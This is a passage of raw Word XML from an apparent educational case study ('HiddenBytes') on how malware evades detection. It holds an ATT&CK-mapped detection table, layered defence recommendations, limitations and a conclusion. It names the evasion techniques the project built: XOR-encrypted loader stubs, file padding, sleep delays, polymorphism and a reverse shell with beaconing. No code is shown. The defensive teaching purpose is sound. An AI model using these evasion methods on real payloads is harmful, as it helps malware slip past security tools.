        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F9ECEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1059</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F9ECEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Command &amp; Scripting Interpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5360"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F9ECEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag interpreter → shell process lineage in EDR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T1071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Layer Protocol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Behavioral analytics for beaconing on outbound TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F9ECEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1497</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F9ECEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Virtualization / Sandbox Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5360"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F9ECEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sleep-skip in sandbox; extend observation to 5 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B22222"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2  Defense-in-Depth Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Layer 1 — Pre-execution: Hash allow-listing + entropy thresholds on file intake</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Layer 2 — Sandbox: Extended timeouts (5 min), sleep-acceleration, large file sampling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Layer 3 — Runtime: EDR behavioral rules (process tree, memory scanning, network calls)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Layer 4 — Network: Zero-trust egress filtering; alert on non-browser TCP to unusual ports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Layer 5 — Response: Memory forensics capability (Volatility) to analyze decrypted payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7B0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Limitations &amp; Honest Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The techniques implemented are effective against signature-based detection but would not evade a well-tuned EDR. Modern endpoint security products like CrowdStrike Falcon and SentinelOne use ML-based behavioral models that would likely flag:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The loader stub's decrypt-and-execute pattern in memory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The reverse shell's dup2 + subprocess.call pattern</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The beaconing reconnect loop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A real attacker at the APT tier would use compiled binaries, reflective DLL injection, process hollowing, and living-off-the-land techniques that are significantly harder to detect. This project covers commodity-level techniques — appropriate for an intermediate-level educational exercise and sufficient to understand the foundational concepts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7B0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This engagement demonstrated that simple, well-understood techniques (XOR encryption, file size manipulation, execution delay, variable-level polymorphism) remain effective against static detection in 2024. The tools developed provide a concrete educational framework for understanding why behavioral detection has become the industry standard, and what specific signals defenders should prioritize.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The most important lesson is architectural: no single detection layer is sufficient. The combination of static analysis, dynamic sandboxing, runtime EDR, and network monitoring creates a detection surface that is genuinely difficult to evade at scale — which is exactly why professional attackers invest so heavily in operational security, not just technical evasion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All techniques documented here are matched with defensive countermeasures. The goal is not to teach evasion — it is to teach detection by example.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:head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0000" w:sz="6"/>
      </w:pBdr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="7B0000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">HiddenBytes — Technical Case Study</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">   |   Educational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7B0000"/>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B2222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2026-03-05T10:00:41.168Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-05T10:00:41.169Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>